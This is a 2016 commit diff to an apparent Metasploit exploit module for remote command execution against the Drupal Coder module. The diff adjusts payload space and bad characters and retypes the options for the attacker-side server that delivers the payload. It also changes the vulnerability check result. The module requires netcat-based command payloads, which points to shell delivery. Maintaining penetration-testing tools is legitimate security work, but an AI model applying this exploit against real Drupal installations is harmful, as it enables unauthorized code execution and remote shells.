Fix for Opt params and Space limits

mdisec · mdisec · commit 780e83dabb65 · 2016-07-22T20:48:15.000+03:00
diff --git a/modules/exploits/unix/webapp/drupal_coder_exec.rb b/modules/exploits/unix/webapp/drupal_coder_exec.rb
@@ -37,11 +37,13 @@ def initialize(info={})
       'Privileged'     => false,
       'Payload'        =>
         {
-          'BadChars' => "\x00\x2f",
-          'Compat'         =>
+          'Space'       => 225,
+          'DisableNops' => true,
+          'BadChars'    => "\x00\x2f",
+          'Compat'      =>
             {
-                'PayloadType' => 'cmd',
-                'RequiredCmd' => 'netcat netcat-e'
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'netcat netcat-e'
             },
         },
       'Platform'       => ['unix'],
@@ -54,8 +56,8 @@ def initialize(info={})
     register_options(
       [
         OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/']),
-        OptString.new('SRVHOST', [true, 'Bogus web server host to receive request from target and deliver payload']),
-        OptString.new('SRVPORT', [true, 'Bogus web server port to listen'])
+        OptAddress.new('SRVHOST', [true, 'Bogus web server host to receive request from target and deliver payload']),
+        OptPort.new('SRVPORT', [true, 'Bogus web server port to listen'])
       ]
     )
   end
@@ -66,7 +68,7 @@ def check
       'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
     )
     if res && res.code == 200
-      Exploit::CheckCode::Vulnerable
+      Exploit::CheckCode::Appears
     else
       Exploit::CheckCode::Safe
     end
